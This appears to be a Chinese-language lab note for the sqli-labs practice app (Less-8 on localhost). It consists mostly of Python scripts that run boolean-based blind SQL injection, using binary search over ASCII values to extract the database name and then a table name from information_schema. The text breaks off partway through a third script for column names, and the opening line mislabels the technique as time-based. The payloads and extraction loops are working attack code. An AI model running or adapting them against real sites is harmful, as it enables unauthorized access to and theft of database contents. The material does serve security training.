发现页面存在注点,使用时间盲注脚本进行注入--
import requests
def inject_database(url):
name = ' '
for i in range(1, 20):
low = 48
high = 122
middle = (low + high) // 2
while low < high:
payload = "1' and ascii(substr(database(),%d,1))>%d-- " % (i, middle)
params = {"id": payload}
r = requests.get(url, params=params)
if 'You are in' in r.text:
low = middle + 1
else:
high = middle
middle = (low + high) // 2
if middle > 32:
name += chr(middle)
print(f"Current database name: {name}")
low = 48
high = 122
middle = (low + high) // 2
print(f"Final database name: {name}")
if __name__ == "__main__":
url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
inject_database(url)
用一个布尔盲注攻击,从数据库中提取表名
import requests
def inject_table_name(url, database_name):
table_name = ''
for i in range(1, 20):
low = 48 # '0'
high = 122 # 'z'
middle = (low + high) // 2
while low < high:
# payload
payload = f"1' and ascii(substr((select table_name from information_schema.tables where table_schema='{database_name}' limit 0,1),{i},1))>{middle}-- "
params = {"id": payload}
r = requests.get(url, params=params)
if 'You are in' in r.text:
low = middle + 1
else:
high = middle
middle = (low + high) // 2
if middle > 32:
table_name += chr(middle)
print(table_name)
low = 48
high = 122
middle = (low + high) // 2
print(f"Final table name: {table_name}")
if __name__ == "__main__":
url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
database_name = "security"
inject_table_name(url, database_name)
import requests
def inject_column_name(url, databa